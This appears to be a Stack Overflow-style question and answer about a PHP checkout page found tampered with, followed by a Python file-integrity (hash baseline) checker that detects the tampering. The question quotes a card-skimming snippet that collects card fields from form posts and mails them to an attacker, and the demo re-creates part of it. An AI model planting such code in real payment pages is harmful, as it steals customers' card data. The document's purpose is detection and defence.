samyb8

Reputation: 2598

Avoiding PHP injection to Post data from a form

I was just re-testing the flow in a website we have created and when I got to the Checkout section, I realized there was some code in the page that we had never written. It was an injection and it really scared us. The code was just put as text in one of the checkout files, so it wouldn't execute since it was not within PHP tags, but it was pretty scary.

The code was essentially Posting each of the fields for payment instructions (name on card, card type, card number, cvc, expiration date) and then executing a mail() php function to send the information to a specific email. I even have the email of the hacker!!

```php
// The injected snippet, reproduced as found (the recipient address is redacted).
// It appends each submitted card field to $message and mails the result
// to the attacker's address. Note the "Cvv" line actually reads card_brand.
$message .= "Number : ".$_POST['card_number']."\n";
$message .= "Cvv : ".$_POST['card_brand']."\n";
$message .= "exp : ".$_POST['card_expiration']."\n";
$message .= "Name : ".$_POST['card_holder']."\n";
$i = "[email protected]";
$subject = "cc";
mail($i,$subject,$message);
```

How could we avoid PHP injections in our site? I contacted Stripe, who supports our payments, to check whether their API is safe enough. I think it is. However, mailing information and other non-payment-related information could easily be hacked with an injection like this. How could we avoid injections in our files?

Thanks!!

Upvotes: 0

Views: 766

Answers (1)

Rob W

Reputation: 9142

That would take a rather smart bot to detect that and inject it in the right place. Someone has access to the FTP or has uploaded a PHP file manager -- which could have come from a file upload script.

Once you get everything cleaned up, perhaps you could take a "hash snapshot" of the files, then scan through them (either automated or manually) to test for hash changes. If anything in a file has changed, the hash of the file will change as well; then you could have it alert someone. From there, you can go through the logs and try to figure out where it came from.

Just an idea.

Upvotes: 1
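The "hash snapshot" check Rob W describes, written out as an added example that is not part of the original answer. It hashes every tracked file under a document root with SHA-256, stores the result as a baseline, and on a later run reports files that were added, removed or modified. The sample document root, the appended exfiltration lines and the dropped file are all constructed inline in the demo so the script runs offline; the tracked suffixes are an assumption and should be widened to whatever your site actually serves.

```python
"""File-integrity baseline check (hash snapshot) for a web document root.

Added example, not code from the original post. Assumes the web root is on
local disk and that a baseline JSON file can be stored somewhere the web
server cannot write to (keeping it inside the web root would let the same
intruder update it).
"""
import hashlib
import json
import tempfile
from pathlib import Path

# Assumption: these are the file types worth tracking on a PHP site.
TRACKED = (".php", ".inc", ".phtml", ".html", ".js", ".htaccess")


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not load into RAM."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> dict:
    """Map of path-relative-to-root -> sha256 for every tracked file."""
    result = {}
    for path in sorted(root.rglob("*")):
        # .htaccess has no suffix, so match on the name as well
        if path.is_file() and (path.suffix in TRACKED or path.name in TRACKED):
            result[path.relative_to(root).as_posix()] = hash_file(path)
    return result


def save_baseline(baseline: dict, out: Path) -> None:
    out.write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots: new files, deleted files, and changed hashes."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Constructed scenario: clean site, then the kind of tampering in the question."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "checkout").mkdir()
        checkout = root / "checkout" / "checkout.php"
        checkout.write_text("<?php\n// constructed sample file\necho 'checkout';\n")
        (root / "index.php").write_text("<?php echo 'home';\n")

        baseline_path = root / "baseline.json"   # in the demo only; keep it off the web root in practice
        save_baseline(snapshot(root), baseline_path)

        # Tampering, constructed for the demo: exfiltration lines appended to the
        # checkout file, a new file dropped, and a legitimate file deleted.
        with checkout.open("a") as fh:
            fh.write('$message .= "Number : ".$_POST[\'card_number\']."\\n";\n')
            fh.write('mail($i,$subject,$message);\n')
        (root / "fm.php").write_text("<?php // constructed stand-in for an uploaded file manager\n")
        (root / "index.php").unlink()

        return compare(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    # Expected: checkout/checkout.php modified, fm.php added, index.php removed
    print(json.dumps(demo(), indent=1))
```

Run `snapshot` once after the clean-up and again from cron (or a deploy hook); any non-empty `compare` result is the alert. Two practical points: the baseline and the checking script must live outside the web root and be owned by a user the web server cannot write as, otherwise whoever dropped the snippet can rewrite the baseline too; and every legitimate deploy has to refresh the baseline, or the first alert after a release will be noise.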
